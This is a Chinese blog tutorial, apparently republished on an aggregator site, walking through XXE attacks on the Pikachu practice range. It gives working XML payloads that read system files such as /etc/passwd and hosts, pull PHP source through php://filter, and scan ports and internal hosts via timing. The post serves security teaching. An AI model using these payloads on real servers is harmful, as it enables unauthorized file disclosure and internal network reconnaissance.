当前位置：首页 > news >正文

网站开发毕业日志/网络营销渠道可分为哪些

news 文章来源：https://blog.csdn.net/weixin_58783105/article/details/133418932 2025/2/26 13:08:49

网站开发毕业日志,网络营销渠道可分为哪些,wordpress 弹窗广告插件,门户网站管理建设文章目录 1. XXE1.1 查看系统文件内容1.2 查看PHP源代码1.3 查看开放端口1.4 探测内网主机 1. XXE 漏洞描述 XXE（XML External Entity）攻击是一种利用XML解析器漏洞的攻击。在这种攻击中，攻击者通过在XML文件中插入恶意实体来触发解析器加载…

文章目录

1. XXE
- 1.1 查看系统文件内容
- 1.2 查看PHP源代码
- 1.3 查看开放端口
- 1.4 探测内网主机

1. XXE

漏洞描述

XXE（XML External Entity）攻击是一种利用XML解析器漏洞的攻击。在这种攻击中，攻击者通过在XML文件中插入恶意实体来触发解析器加载恶意代码或文件，从而执行任意代码、读取本地文件等操作。

在XXE攻击中，攻击者通常会构造一个包含恶意实体的XML文件，并将其提交到目标服务器上进行解析。当服务器使用XML解析器解析文件时，会读取实体并展开其定义，从而导致恶意代码被执行或文件被泄露。

例如，在以下XML代码中：

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>

所包含的ENTITY xxe就是一个XXE实体，它指定了一个名为“xxe”的实体，其内容来自于file:///etc/passwd路径下的文件。当XML解析器解析该文件时，它会尝试读取并展开xxe实体，从而将/etc/passwd文件内容返回给攻击者。

防范XXE攻击，可以采取以下措施：

对用户提交的XML文件进行严格校验，禁止包含未知实体、注释等内容。
禁用或限制XML解析器的外部实体加载功能，例如禁止加载网络上的实体、限制文件读取范围等。
使用安全的XML解析库，如使用DOM解析器时要确保开启Entity Expansion Limit选项等。

参考文章：XXE漏洞利用技巧：从XML到远程代码执行。

先输入一个非xml的内容，查看页面响应。

在这里插入图片描述

输入一个包含命名实体（内部实体）的xml数据（以下代码中xxe是命名实体的实体名称）：

<?xml version="1.0"?> 
<!DOCTYPE foo [    
<!ENTITY xxe "芜湖" > ]> 
<foo>&xxe;</foo>

网页上回显“芜湖”，说明网页对输入的xml数据是有结果回显的。

在这里插入图片描述

但是这里只能判断是否有回显，不能判断是否支持外部实体。

1.1 查看系统文件内容

查看hosts文件

输入payload，代码中xxe是外部实体的实体名称：

<?xml version="1.0"?> 
<!DOCTYPE foo [    
<!ENTITY xxe SYSTEM "file:///C:/Windows/System32/drivers/etc/hosts" > ]> 
<foo>&xxe;</foo>

在这里插入图片描述

注意：file://协议只能用绝对路径，无法使用相对路径。

1.2 查看PHP源代码

查看php源代码一般用php伪协议php://filter

构造payload：

<?xml version="1.0"?> 
<!DOCTYPE foo [    
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=C:/software/phpstudy_pro/WWW/pikachu/vul/xxe/xxe.php" > ]> 
<foo>&xxe;</foo>

获得了base64编码的xxe.php文件源代码

在这里插入图片描述

通过utools中的插件进行解码即可。
在这里插入图片描述

1.3 查看开放端口

在输入框中输入下面的xml代码。

<?xml version="1.0"?> 
<!DOCTYPE foo [    
<!ENTITY xxe SYSTEM "http://127.0.0.1:80" > ]> 
<foo>&xxe;</foo>

<?xml version="1.0"?> 
<!DOCTYPE foo [    
<!ENTITY xxe SYSTEM "http://127.0.0.1:81" > ]> 
<foo>&xxe;</foo>

页面显示如下图，但是81端口的处理速度较慢。因为服务器80端口是开放的而81端口是关闭的。

使用bp抓包后进行爆破，爆破1~100这100个端口。

在这里插入图片描述

点击Columns，勾选Response received，然后就增加了发送请求和回答复之间的时间的显示。

在这里插入图片描述

通过观察时间的长短，判断出了有哪些端口开放，这里只有80端口是开放的。

1.4 探测内网主机

同端口探测一样，可根据返回信息内容的接收响应时间来判断ip是否存在。

构造payload

<?xml version="1.0"?> 
<!DOCTYPE foo [    
<!ENTITY xxe SYSTEM "http://192.168.188.183" > ]> 
<foo>&xxe;</foo>

在这里插入图片描述

点击Columns，勾选Response received，然后就增加了发送请求和回答复之间的时间的显示。
在这里插入图片描述

使用nmap扫描来成功内网主机

在这里插入图片描述

对比两次的结果，信息一致。

网站开发毕业日志/网络营销渠道可分为哪些

文章目录

1. XXE

1.1 查看系统文件内容

1.2 查看PHP源代码

1.3 查看开放端口

1.4 探测内网主机

相关文章：

Pikachu靶场——XXE 漏洞

vscode登录租的新服务器

Verilog参数定义与仿真模块中的参数修改

Android studio升级Giraffe | 2022.3.1 Patch 1踩坑

使用U3D、pico开发VR（二）——添加手柄摇杆控制移动

【FPGA项目】图像采集及显示（2）详细设计方案

查找排序部分习题 242. 有效的字母异位词 74. 搜索二维矩阵 1. 两数之和 167.两数之和 II

MATLAB算法实战应用案例精讲-【优化算法】冠状病毒优化算法(COVIDOA)(附MATLAB代码实现)

React查询、搜索类功能的实现

k8s搭建EFK日志系统

LuatOS-SOC接口文档(air780E)-- fonts - 字体库

[Java·算法·困难]LeetCode124.二叉树中的最大路径和

【微服务保护】

【MATLAB第78期】基于MATLAB的VMD-SSA-LSTM麻雀算法优化LSTM时间序列预测模型

分类预测 | MATLAB实现SSA-FS-SVM麻雀算法同步优化特征选择结合支持向量机分类预测

唤醒手腕 Matlab 游戏编程常用技术知识点详细教程（更新中）

2023八股每日一题（九月份）

分布式链路追踪--SkyWalking7.0.0+es7.0.0

web：[RoarCTF 2019]Easy Calc

【Java每日一题】— —第十七题：杨辉三角（等腰三角形）。（2023.10.01）

Ubuntu20.04.1编译qt6.5.3版mysql驱动

Stm32_标准库_4_TIM中断_PWM波形_呼吸灯

华为摄像头智能安防监控解决方案

The rise of language models

Windows下使用VS2010编译出带pdb可调试的FFmpeg库

36.骑士周游算法及其基于贪心算法的优化

win安装vscode

【图像分割】图像检测（分割、特征提取）、各种特征（面积等）的测量和过滤（Matlab代码实现）

Linux内核存在缺陷发行陷困境

通过java向jar写入新文件